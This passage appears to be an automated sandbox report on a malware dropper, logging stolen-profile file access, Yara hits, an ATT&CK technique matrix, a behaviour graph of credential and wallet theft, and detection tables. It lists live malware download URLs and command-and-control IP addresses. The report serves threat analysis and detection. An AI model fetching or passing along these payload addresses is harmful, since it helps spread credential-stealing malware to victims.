                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeDirectory queried: C:\Users\user\Documents\SimpleAdobe
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeDirectory queried: C:\Users\user\Documents\SimpleAdobe

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0000000C.00000002.2320846713.0000000004319000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 20.3.EEmC0rfrxeQDEUW4Qmh7BQX4.exe.4920000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.3.EEmC0rfrxeQDEUW4Qmh7BQX4.exe.4920000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000014.00000003.2296250403.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 41.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.A_22rjVO67ooiUk2ueyL6tMl.exe.3ce6ff0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.0.A_22rjVO67ooiUk2ueyL6tMl.exe.530000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.A_22rjVO67ooiUk2ueyL6tMl.exe.3ce6ff0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2606812448.0000000003C8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.2465855956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exe, type: DROPPED
                      Source: Yara matchFile source: 11.2.J9jGBSSbDD3yrTx79DzmOLls.exe.aa0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.J9jGBSSbDD3yrTx79DzmOLls.exe.ac7ac0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.J9jGBSSbDD3yrTx79DzmOLls.exe.ac7ac0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: J9jGBSSbDD3yrTx79DzmOLls.exe PID: 3652, type: MEMORYSTR
                      Source: Yara matchFile source: 0000000D.00000003.2439988856.0000000005CB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2429156164.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\G1Y1cICOYjk_P6MTvNhL7sj.zip, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\i2FqtYqlXCxQLo2ZIevRzA8.zip, type: DROPPED
                      Source: Yara matchFile source: 9.2.ogoGQsWFwF_EcodN5qF7hiVC.exe.477ac0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.4510000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.42e7719.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.3.EEmC0rfrxeQDEUW4Qmh7BQX4.exe.4920000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.4510000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.42e7719.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.2260000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.2260000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.ogoGQsWFwF_EcodN5qF7hiVC.exe.450000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.ogoGQsWFwF_EcodN5qF7hiVC.exe.477ac0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.3.EEmC0rfrxeQDEUW4Qmh7BQX4.exe.4920000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.2296250403.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2337447194.0000000004510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2317913229.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2320846713.0000000004210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ogoGQsWFwF_EcodN5qF7hiVC.exe PID: 3056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zfQlIB6J8n2u_zLV5LHnA1xW.exe PID: 3920, type: MEMORYSTR
                      Source: Yara matchFile source: 41.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.A_22rjVO67ooiUk2ueyL6tMl.exe.3ce6ff0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.A_22rjVO67ooiUk2ueyL6tMl.exe.3ce6ff0.8.unpack, type: UNPACKEDPE
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6895A0C0 CorBindToRuntimeEx,GetModuleHandleW,GetModuleHandleW,__cftoe,GetModuleHandleW,GetProcAddress,14_2_6895A0C0
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      Abuse Elevation Control Mechanism
                      51
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      2
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API
                      1
                      Windows Service
                      1
                      DLL Side-Loading
                      1
                      Deobfuscate/Decode Files or Information
                      1
                      Credential API Hooking
                      14
                      File and Directory Discovery
                      Remote Desktop Protocol31
                      Data from Local System
                      1
                      Application Layer Protocol
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Shared Modules
                      1
                      Scheduled Task/Job
                      1
                      Bypass User Account Control
                      1
                      Abuse Elevation Control Mechanism
                      Security Account Manager256
                      System Information Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      SteganographyAutomated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts3
                      Command and Scripting Interpreter
                      11
                      Registry Run Keys / Startup Folder
                      1
                      Windows Service
                      4
                      Obfuscated Files or Information
                      NTDS1
                      Query Registry
                      Distributed Component Object Model1
                      Credential API Hooking
                      Protocol ImpersonationTraffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts1
                      Scheduled Task/Job
                      1
                      Services File Permissions Weakness
                      511
                      Process Injection
                      1
                      Install Root Certificate
                      LSA Secrets10101
                      Security Software Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                      Scheduled Task/Job
                      23
                      Software Packing
                      Cached Domain Credentials571
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items11
                      Registry Run Keys / Startup Folder
                      1
                      Timestomp
                      DCSync2
                      Process Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job1
                      Services File Permissions Weakness
                      1
                      DLL Side-Loading
                      Proc Filesystem1
                      Application Window Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Bypass User Account Control
                      /etc/passwd and /etc/shadow2
                      System Owner/User Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron23
                      Masquerading
                      Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd571
                      Virtualization/Sandbox Evasion
                      Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task511
                      Process Injection
                      KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                      Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                      Services File Permissions Weakness
                      GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                      Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                      Rundll32
                      Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1447491 Sample: CHA0VZiz8y.exe Startdate: 25/05/2024 Architecture: WINDOWS Score: 100 116 Multi AV Scanner detection for domain / URL 2->116 118 Found malware configuration 2->118 120 Malicious sample detected (through community Yara rule) 2->120 122 21 other signatures 2->122 8 CHA0VZiz8y.exe 11 56 2->8         started        13 svchost.exe 2->13         started        15 svchost.exe 2->15         started        17 2 other processes 2->17 process3 dnsIp4 110 176.111.174.109 WILWAWPL Russian Federation 8->110 112 87.240.132.67 VKONTAKTE-SPB-AShttpvkcomRU Russian Federation 8->112 114 17 other IPs or domains 8->114 72 C:\Users\...\zfQlIB6J8n2u_zLV5LHnA1xW.exe, PE32 8->72 dropped 74 C:\Users\...\xS7PhKcNZTx4FuBAD1RB9kbJ.exe, PE32+ 8->74 dropped 76 C:\Users\...\ogoGQsWFwF_EcodN5qF7hiVC.exe, PE32 8->76 dropped 78 26 other malicious files 8->78 dropped 160 Query firmware table information (likely to detect VMs) 8->160 162 Drops PE files to the document folder of the user 8->162 164 Creates HTML files with .exe extension (expired dropper behavior) 8->164 166 9 other signatures 8->166 19 _rSi8sV87ppx0bgkbETdFbEZ.exe 8->19         started        22 EEmC0rfrxeQDEUW4Qmh7BQX4.exe 8->22         started        26 0YXJTGaxIrryNdvx7SKozTjt.exe 8->26         started        28 14 other processes 8->28 file5 signatures6 process7 dnsIp8 54 C:\Users\...\_rSi8sV87ppx0bgkbETdFbEZ.tmp, PE32 19->54 dropped 30 _rSi8sV87ppx0bgkbETdFbEZ.tmp 19->30         started        102 185.172.128.170 NADYMSS-ASRU Russian Federation 22->102 56 C:\Users\user\AppData\...\softokn3[1].dll, PE32 22->56 dropped 58 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 22->58 dropped 60 C:\Users\user\AppData\...\mozglue[1].dll, PE32 22->60 dropped 68 9 other files (5 malicious) 22->68 dropped 136 Tries to steal Mail credentials (via file / registry access) 22->136 138 Tries to harvest and steal ftp login credentials 22->138 140 Tries to harvest and steal browser information (history, passwords, etc) 22->140 154 2 other signatures 22->154 142 Query firmware table information (likely to detect VMs) 26->142 144 Tries to detect sandboxes and other dynamic analysis tools (window names) 26->144 146 Disables Windows Defender (deletes autostart) 26->146 156 6 other signatures 26->156 104 5.42.65.116 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU Russian Federation 28->104 106 5.42.67.8 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU Russian Federation 28->106 108 2 other IPs or domains 28->108 62 C:\Users\user\AppData\Local\Temp\kat806.tmp, PE32 28->62 dropped 64 C:\Users\user\AppData\Local\...\eKhLlZQ.cpl, PE32 28->64 dropped 66 C:\Users\user\AppData\...\Protect544cd51a.dll, PE32 28->66 dropped 70 6 other malicious files 28->70 dropped 148 Detected unpacking (changes PE section rights) 28->148 150 Detected unpacking (overwrites its own PE header) 28->150 152 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 28->152 158 10 other signatures 28->158 33 RegAsm.exe 28->33         started        37 RegAsm.exe 28->37         started        39 RegAsm.exe 28->39         started        41 7 other processes 28->41 file9 signatures10 process11 dnsIp12 82 C:\Users\user\AppData\...\unins000.exe (copy), PE32 30->82 dropped 84 C:\Users\user\...\turquoisecdplayer.exe, PE32 30->84 dropped 86 C:\Users\user\AppData\...\openh264.dll (copy), PE32+ 30->86 dropped 94 35 other files (24 malicious) 30->94 dropped 43 turquoisecdplayer.exe 30->43         started        96 5.42.65.115 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU Russian Federation 33->96 124 Installs new ROOT certificates 33->124 126 Tries to harvest and steal browser information (history, passwords, etc) 33->126 128 Tries to steal Crypto Currency Wallets 33->128 130 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 37->130 132 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 37->132 98 65.109.242.59 ALABANZA-BALTUS United States 39->98 100 104.102.42.29 AKAMAI-ASUS United States 39->100 88 C:\Users\user\AppData\Local\...\sqls[1].dll, PE32 39->88 dropped 90 C:\Users\...\7U1bGcxK3Lqi_XMHDNEdJrhB.exe, PE32 41->90 dropped 92 C:\Users\user\AppData\Local\...\Install.exe, PE32 41->92 dropped 134 Creates multiple autostart registry keys 41->134 46 conhost.exe 41->46         started        48 conhost.exe 41->48         started        50 rundll32.exe 41->50         started        52 2 other processes 41->52 file13 signatures14 process15 file16 80 C:\ProgramData\...\JANA timezone 2.12.66.exe, PE32 43->80 dropped

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      CHA0VZiz8y.exe39%ReversingLabsWin64.Trojan.Operaloader
                      CHA0VZiz8y.exe41%VirustotalBrowse
                      CHA0VZiz8y.exe100%AviraHEUR/AGEN.1314708
                      SourceDetectionScannerLabelLink
                      C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe100%AviraTR/Staser.ykqao
                      C:\ProgramData\JANA timezone 2.12.66\JANA timezone 2.12.66.exe100%AviraHEUR/AGEN.1324352
                      C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe100%Joe Sandbox ML
                      C:\ProgramData\MPGPH131\MPGPH131.exe100%Joe Sandbox ML
                      C:\ProgramData\JANA timezone 2.12.66\JANA timezone 2.12.66.exe100%Joe Sandbox ML
                      C:\ProgramData\freebl3.dll0%ReversingLabs
                      C:\ProgramData\mozglue.dll0%ReversingLabs
                      C:\ProgramData\msvcp140.dll0%ReversingLabs
                      C:\ProgramData\nss3.dll0%ReversingLabs
                      C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe92%ReversingLabsWin64.Trojan.Privateloader
                      C:\ProgramData\softokn3.dll0%ReversingLabs
                      C:\ProgramData\vcruntime140.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\oiii[1].exe46%ReversingLabsWin64.Trojan.Privateloader
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\123p[1].exe92%ReversingLabsWin64.Trojan.Privateloader
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Retailer_prog[1].exe79%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Default15_s[1].exe75%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\default_s[1].exe67%ReversingLabsWin32.Spyware.Lummastealer
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\sqls[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\timeSync[1].exe54%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-MGI15.tmp\_isetup\_RegDLL.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-MGI15.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-MGI15.tmp\_isetup\_isdecmp.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-MGI15.tmp\_isetup\_setup64.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-MGI15.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\kat806.tmp4%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\Qt5OpenGL.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\Qt5Svg.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\Qt5WinExtras.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\Qt5Xml.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\QtAVWidgets1.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\avdevice-58.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\is-2FJL8.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\is-3LABF.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\is-5LVFF.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\is-99KJO.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\is-9ULQD.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\is-BEO98.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\is-CKPLA.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\is-E4QTE.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\is-F6JQ6.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\is-FS8TN.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\is-HB2OO.tmp88%ReversingLabsWin32.Trojan.Ekstak
                      C:\Users\user\AppData\Local\Turquoise CD Player\is-JE3T2.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\is-JVAO2.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\is-KQVQS.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\is-U2S42.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\libcurl.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\libeay32.dll (copy)88%ReversingLabsWin32.Trojan.Ekstak
                      C:\Users\user\AppData\Local\Turquoise CD Player\libmp3lame.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\mousehelper.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\msvcp120.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\msvcp140.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Turquoise CD Player\msvcp140_1.dll (copy)0%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl070%URL Reputationsafe
                      https://db-ip.com/0%URL Reputationsafe
                      http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr0%URL Reputationsafe
                      http://www.innosetup.com/0%URL Reputationsafe
                      https://api.ip.sb/ip0%URL Reputationsafe
                      https://www.ecosia.org/newtab/0%URL Reputationsafe
                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                      https://ipinfo.io/0%URL Reputationsafe
                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL0%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                      https://aka.ms/dotnet-core-applaunch?0%URL Reputationsafe
                      http://www.openssl.org/support/faq.html0%URL Reputationsafe
                      https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                      https://lop.foxesjoy.com/R100%Avira URL Cloudmalware
                      http://5.42.66.10/download/th/retail.phphp0%Avira URL Cloudsafe
                      https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                      http://147.45.47.149:54674/vape/niko.exe100%Avira URL Cloudmalware
                      https://aka.ms/dotnet-core-applaunch?missing_runtime=true&arch=&rid=falsetrue%pLuLdluldeEpP%c0%Avira URL Cloudsafe
                      https://login.vk.com/?act=logout&hash=b3a96a5acc0a409d0f&_origin=https%3A%2F%2Fvk.com&lrt=BDpxh3TFcr0%Avira URL Cloudsafe
                      https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                      http://ns.microsoft.co2/t/Re0%Avira URL Cloudsafe
                      https://papi.vk.com/pushsse/ruim0%Avira URL Cloudsafe
                      https://fleur-de-lis.sbs/p~0%Avira URL Cloudsafe
                      https://aka.ms/dotnet-core-applaunch?missing_runtime=true&arch=&rid=falsetrue%pLuLdluldeEpP%c0%VirustotalBrowse
                      http://5.42.66.10/download/th/retail.phphp7%VirustotalBrowse
                      https://fleur-de-lis.sbs/jhgfdD0%Avira URL Cloudsafe
                      https://papi.vk.com/pushsse/ruim0%VirustotalBrowse
                      https://lop.foxesjoy.com:80/ssl/crt.exe100%Avira URL Cloudmalware
                      http://85.192.56.26/api/flash.phpdow0%Avira URL Cloudsafe
                      https://vk.com0%Avira URL Cloudsafe
                      https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                      https://vk.com/doc5294803_669843349?hash=9zPjskz2rlw4WpxESbjigfNghvMBCG7BIpLthkH7eKs&dl=usJOnLsECNfe0%Avira URL Cloudsafe
                      https://vk.com:80/0%Avira URL Cloudsafe
                      https://vk.com1%VirustotalBrowse
                      http://fleur-de-lis.sbs/jhgfd0%Avira URL Cloudsafe
                      http://5.42.66.10/download/th/space.php#100%Avira URL Cloudmalware
                      http://147.45.47.149:54674/vape/niko.exe15%VirustotalBrowse
                      http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exe100%Avira URL Cloudmalware
                      https://kurd.computer/dll/builddoc.exee0%Avira URL Cloudsafe
                      https://vk.com:80/0%VirustotalBrowse
                      https://aka.ms/dotnet-core-applaunch?framework=&framework_version=missing_runtime=true&arch=&rid=0%Avira URL Cloudsafe
                      http://f.alie3ksggg.com/f/oiii.exe100%Avira URL Cloudmalware
                      http://fleur-de-lis.sbs/jhgfd2%VirustotalBrowse
                      https://www.sqlite.org/lang_corefunc.html0%VirustotalBrowse
                      https://aka.ms/dotnet-core-applaunch?framework=&framework_version=missing_runtime=true&arch=&rid=0%VirustotalBrowse
                      http://f.alie3ksggg.com/f/oiii.exe18%VirustotalBrowse
                      http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exe21%VirustotalBrowse
